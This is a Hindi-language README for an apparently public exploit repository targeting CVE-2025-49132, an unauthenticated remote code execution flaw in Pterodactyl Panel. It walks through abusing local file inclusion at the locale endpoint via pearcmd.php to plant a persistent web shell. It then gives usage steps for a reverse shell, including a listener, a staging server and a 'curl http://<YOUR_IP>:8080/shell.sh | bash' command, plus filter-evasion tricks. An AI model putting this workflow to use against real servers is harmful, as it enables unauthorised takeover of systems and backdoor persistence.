
CVE-2025-49132 के लिए स्वचालित शोषण, Pterodactyl Panel में एक महत्वपूर्ण अप्रमाणित RCE। लगातार वेब शेल तैनात करने और रिवर्स शेल एक्सेस प्राप्त करने के लिए लोकेल एंडपॉइंट के माध्यम से LFI का लाभ उठाता है।
इस रिपॉज़िटरी में CVE-2025-49132 के लिए एक विशेष एक्सप्लॉइट शामिल है, जो Pterodactyl पैनल (v1.11.11 से पहले) में एक गंभीर, बिना प्रमाणीकरण वाली रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है।
यह भेद्यता /locales/locale.json एंडपॉइंट में मौजूद है। locale और namespace क्वेरी पैरामीटरों में हेरफेर करके, एक हमलावर pearcmd.php के साथ इंटरैक्ट करने के लिए लोकल फ़ाइल इन्क्लूज़न (LFI) का लाभ उठा सकता है। यह मनमानी फ़ाइल निर्माण और कमांड निष्पादन की अनुमति देता है, जिससे पूरे सिस्टम से समझौता हो सकता है।
ape.py स्क्रिप्ट निम्नलिखित चरणों को स्वचालित करती है:
PEAR डिस्कवरी: लक्ष्य पर PEAR इंस्टॉलेशन का पता लगाने के लिए डायरेक्टरी संरचना को फ़ज़ किया जाता है।
बैकडोर निर्माण: /tmp/shell.php पर एक स्थायी वेब शेल लिखने के लिए PEAR के config-create का उपयोग किया जाता है।
लक्ष्य पर सफल कॉलबैक प्राप्त करने के लिए, इस वर्कफ़्लो का पालन करें:
penelope -p 4444
स्टेजिंग सर्वर: यदि कस्टम शेल स्क्रिप्ट का उपयोग कर रहे हैं, तो इसे Python के माध्यम से होस्ट करें:
python3 -m http.server 8080
python3 ape.py --host xxx.xxx.xxx --interactive
shell> curl http://<YOUR_IP>:8080/shell.sh | bash
स्पेस बायपासिंग: यह सुनिश्चित करने के लिए स्वचालित रूप से ${IFS} का उपयोग करता है कि पेलोड URL पार्सिंग में बरकरार रहें।
Base64 रैपर: लक्ष्य के Nginx/वेब सर्वर द्वारा कैरेक्टर विकृत होने से रोकने के लिए रिवर्स शेल कमांड को Base64 में लपेटता है।
टाइमआउट हैंडलिंग: यह पता लगाने के लिए डिज़ाइन किया गया है कि वेब अनुरोध हैंग होने पर भी रिवर्स शेल सफलतापूर्वक कनेक्ट हो गया है।